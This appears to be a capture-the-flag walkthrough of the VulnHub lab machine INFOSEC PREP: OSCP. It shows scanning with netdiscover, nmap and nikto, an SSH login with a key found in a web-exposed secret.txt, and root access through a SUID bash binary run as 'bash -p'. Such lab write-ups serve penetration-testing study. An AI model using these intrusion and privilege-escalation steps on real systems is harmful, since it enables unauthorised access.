INFOSEC PREP: OSCP -: (Vulnhub) Walkthrough
Today we’ll be continuing with our new machine on VulnHub. In this article, we will see a walkthrough of an interesting VulnHub machine called INFOSEC PREP: OSCP
Here is the link to downlaod this VM:-
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in netdiscover result. Our target ip address is 192.168.187.229
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
┌─[root@RDX]─[~]
└──╼ #nmap -v -sT -p- 192.168.187.229
With the help of nmap we are able to scan all open tcp ports
Starting with the port number 80 which is http,
┌─[✗]─[root@RDX]─[~]
└──╼ #nikto --url http://192.168.187.229
http://192.168.187.229/secret.txt
Looks like Base64. We decode:
┌─[root@RDX]─[~]
└──╼ #vim secret.txt
┌─[root@RDX]─[~]
└──╼ #chmod 600 secret.txt
┌─[root@RDX]─[~]
└──╼ #ssh -i secret.txt oscp@192.168.187.229
- bash-5.0$ ls
- bash-5.0$ cat id
- bash-5.0$ id
Privilege Escalation
- bash-5.0$ find / -perm -u=s -type f 2>/dev/null
bash-5.0$ ls /usr/bin/bash -l
bash-5.0$ bash -p
bash-5.0# id
bash-5.0# cd /root
bash-5.0# ls
bash-5.0# cat flag.txt
Successfully got the root privilege and the ‘flag.txt’ .